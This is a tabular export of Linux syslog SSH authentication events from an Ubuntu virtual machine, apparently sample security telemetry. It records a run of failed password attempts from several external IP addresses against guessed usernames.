+5312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:54,UbuntuDevEnv,2019-06-26 15:38:53,auth,UbuntuDevEnv,info,Invalid user logview from 192.241.213.168 port 46940,24911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,logview,192.241.213.1,46940,,
+5313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:54,UbuntuDevEnv,2019-06-26 15:38:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,24911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:54,UbuntuDevEnv,2019-06-26 15:38:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,24911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:55,UbuntuDevEnv,2019-06-26 15:38:55,auth,UbuntuDevEnv,info,Failed password for invalid user logview from 192.241.213.168 port 46940 ssh2,24911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,logview,192.241.213.1,46940,,
+5316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:55,UbuntuDevEnv,2019-06-26 15:38:55,auth,UbuntuDevEnv,info,Disconnected from invalid user logview 192.241.213.168 port 46940 [preauth],24911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,logview,192.241.213.1,46940,,
+5317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:38:55,UbuntuDevEnv,2019-06-26 15:38:55,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 46940:11: Bye Bye [preauth],24911,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,46940,,
+5318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:39:52,UbuntuDevEnv,2019-06-26 15:39:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=159.65.242.16  user=root,25119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,159.65.242.1,,0,
+5319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:39:54,UbuntuDevEnv,2019-06-26 15:39:53,auth,UbuntuDevEnv,info,Failed password for root from 159.65.242.16 port 53520 ssh2,25119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.242.1,53520,,
+5320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:39:54,UbuntuDevEnv,2019-06-26 15:39:53,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 159.65.242.16 port 53520 [preauth],25119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,159.65.242.1,53520,,
+5321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:39:54,UbuntuDevEnv,2019-06-26 15:39:53,auth,UbuntuDevEnv,info,"Received disconnect from 159.65.242.16 port 53520:11: Normal Shutdown, Thank you for playing [preauth]",25119,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,159.65.242.1,53520,,
+5322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:23,UbuntuDevEnv,2019-06-26 15:40:22,auth,UbuntuDevEnv,info,Invalid user mediatomb from 192.241.213.168 port 35424,25230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mediatomb,192.241.213.1,35424,,
+5323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:23,UbuntuDevEnv,2019-06-26 15:40:22,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,25230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:23,UbuntuDevEnv,2019-06-26 15:40:22,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,25230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:24,UbuntuDevEnv,2019-06-26 15:40:24,auth,UbuntuDevEnv,info,Failed password for invalid user mediatomb from 192.241.213.168 port 35424 ssh2,25230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mediatomb,192.241.213.1,35424,,
+5326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:24,UbuntuDevEnv,2019-06-26 15:40:24,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 35424:11: Bye Bye [preauth],25230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,35424,,
+5327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:24,UbuntuDevEnv,2019-06-26 15:40:24,auth,UbuntuDevEnv,info,Disconnected from invalid user mediatomb 192.241.213.168 port 35424 [preauth],25230,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mediatomb,192.241.213.1,35424,,
+5328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:26,UbuntuDevEnv,2019-06-26 15:40:26,auth,UbuntuDevEnv,info,Invalid user ftp01 from 66.70.130.155 port 59708,25239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp01,66.70.130.1,59708,,
+5329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:26,UbuntuDevEnv,2019-06-26 15:40:26,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,25239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:26,UbuntuDevEnv,2019-06-26 15:40:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,25239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:27,UbuntuDevEnv,2019-06-26 15:40:27,auth,UbuntuDevEnv,info,Failed password for invalid user ftp01 from 66.70.130.155 port 59708 ssh2,25239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp01,66.70.130.1,59708,,
+5332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:27,UbuntuDevEnv,2019-06-26 15:40:27,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp01 66.70.130.155 port 59708 [preauth],25239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp01,66.70.130.1,59708,,
+5333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:40:27,UbuntuDevEnv,2019-06-26 15:40:27,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 59708:11: Bye Bye [preauth],25239,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,59708,,
+5334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:41:54,UbuntuDevEnv,2019-06-26 15:41:54,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168  user=news,25544,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,news,192.241.213.1,,0,
+5335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:41:56,UbuntuDevEnv,2019-06-26 15:41:56,auth,UbuntuDevEnv,info,Failed password for news from 192.241.213.168 port 52148 ssh2,25544,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,52148,,
+5336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:41:56,UbuntuDevEnv,2019-06-26 15:41:56,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 52148:11: Bye Bye [preauth],25544,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,52148,,
+5337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:41:56,UbuntuDevEnv,2019-06-26 15:41:56,auth,UbuntuDevEnv,info,Disconnected from authenticating user news 192.241.213.168 port 52148 [preauth],25544,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,news,192.241.213.1,52148,,
+5338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:42:47,UbuntuDevEnv,2019-06-26 15:42:46,auth,UbuntuDevEnv,info,Invalid user server from 66.70.130.155 port 48454,25725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,66.70.130.1,48454,,
+5339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:42:47,UbuntuDevEnv,2019-06-26 15:42:46,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,25725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:42:47,UbuntuDevEnv,2019-06-26 15:42:46,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,25725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:42:49,UbuntuDevEnv,2019-06-26 15:42:49,auth,UbuntuDevEnv,info,Failed password for invalid user server from 66.70.130.155 port 48454 ssh2,25725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,66.70.130.1,48454,,
+5342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:42:49,UbuntuDevEnv,2019-06-26 15:42:49,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 48454:11: Bye Bye [preauth],25725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,48454,,
+5343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:42:49,UbuntuDevEnv,2019-06-26 15:42:49,auth,UbuntuDevEnv,info,Disconnected from invalid user server 66.70.130.155 port 48454 [preauth],25725,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,server,66.70.130.1,48454,,
+5344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:44:03,UbuntuDevEnv,2019-06-26 15:44:03,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168  user=test,26006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,192.241.213.1,,0,
+5345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:44:05,UbuntuDevEnv,2019-06-26 15:44:05,auth,UbuntuDevEnv,info,Failed password for test from 192.241.213.168 port 40642 ssh2,26006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,40642,,
+5346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:44:05,UbuntuDevEnv,2019-06-26 15:44:05,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 40642:11: Bye Bye [preauth],26006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,40642,,
+5347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:44:05,UbuntuDevEnv,2019-06-26 15:44:05,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 192.241.213.168 port 40642 [preauth],26006,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,192.241.213.1,40642,,
+5348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:44:52,UbuntuDevEnv,2019-06-26 15:44:51,auth,UbuntuDevEnv,info,Invalid user advent from 66.70.130.155 port 37202,26179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,advent,66.70.130.1,37202,,
+5349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:44:52,UbuntuDevEnv,2019-06-26 15:44:51,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,26179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:44:52,UbuntuDevEnv,2019-06-26 15:44:51,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,26179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:44:54,UbuntuDevEnv,2019-06-26 15:44:53,auth,UbuntuDevEnv,info,Failed password for invalid user advent from 66.70.130.155 port 37202 ssh2,26179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,advent,66.70.130.1,37202,,
+5352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:44:54,UbuntuDevEnv,2019-06-26 15:44:53,auth,UbuntuDevEnv,info,Disconnected from invalid user advent 66.70.130.155 port 37202 [preauth],26179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,advent,66.70.130.1,37202,,
+5353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:44:54,UbuntuDevEnv,2019-06-26 15:44:53,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 37202:11: Bye Bye [preauth],26179,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,37202,,
+5354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:21,UbuntuDevEnv,2019-06-26 15:46:20,auth,UbuntuDevEnv,info,Invalid user developer from 192.241.213.168 port 57364,26579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,192.241.213.1,57364,,
+5355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:21,UbuntuDevEnv,2019-06-26 15:46:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,26579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:21,UbuntuDevEnv,2019-06-26 15:46:20,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,26579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:23,UbuntuDevEnv,2019-06-26 15:46:23,auth,UbuntuDevEnv,info,Failed password for invalid user developer from 192.241.213.168 port 57364 ssh2,26579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,192.241.213.1,57364,,
+5358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:24,UbuntuDevEnv,2019-06-26 15:46:23,auth,UbuntuDevEnv,info,Disconnected from invalid user developer 192.241.213.168 port 57364 [preauth],26579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,developer,192.241.213.1,57364,,
+5359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:24,UbuntuDevEnv,2019-06-26 15:46:23,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 57364:11: Bye Bye [preauth],26579,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,57364,,
+5360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:53,UbuntuDevEnv,2019-06-26 15:46:53,auth,UbuntuDevEnv,info,Invalid user pul from 66.70.130.155 port 54180,26693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,66.70.130.1,54180,,
+5361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:53,UbuntuDevEnv,2019-06-26 15:46:53,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,26693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:53,UbuntuDevEnv,2019-06-26 15:46:53,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,26693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:55,UbuntuDevEnv,2019-06-26 15:46:55,auth,UbuntuDevEnv,info,Failed password for invalid user pul from 66.70.130.155 port 54180 ssh2,26693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,66.70.130.1,54180,,
+5364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:55,UbuntuDevEnv,2019-06-26 15:46:55,auth,UbuntuDevEnv,info,Disconnected from invalid user pul 66.70.130.155 port 54180 [preauth],26693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pul,66.70.130.1,54180,,
+5365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:46:55,UbuntuDevEnv,2019-06-26 15:46:55,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 54180:11: Bye Bye [preauth],26693,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,54180,,
+5366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:47:38,UbuntuDevEnv,2019-06-26 15:47:38,auth,UbuntuDevEnv,info,Did not receive identification string from 95.128.43.164 port 59976,26856,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,95.128.43.1,59976,,
+5367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:31,UbuntuDevEnv,2019-06-26 15:48:31,auth,UbuntuDevEnv,info,Invalid user yuanwd from 192.241.213.168 port 45858,27040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,192.241.213.1,45858,,
+5368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:31,UbuntuDevEnv,2019-06-26 15:48:31,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=192.241.213.168,27040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,192.241.213.1,,0,
+5369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:31,UbuntuDevEnv,2019-06-26 15:48:31,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,27040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:33,UbuntuDevEnv,2019-06-26 15:48:33,auth,UbuntuDevEnv,info,Failed password for invalid user yuanwd from 192.241.213.168 port 45858 ssh2,27040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,192.241.213.1,45858,,
+5371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 15:48:33,UbuntuDevEnv,2019-06-26 15:48:33,auth,UbuntuDevEnv,info,Received disconnect from 192.241.213.168 port 45858:11: Bye Bye [preauth],27040,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,192.241.213.1,45858,,
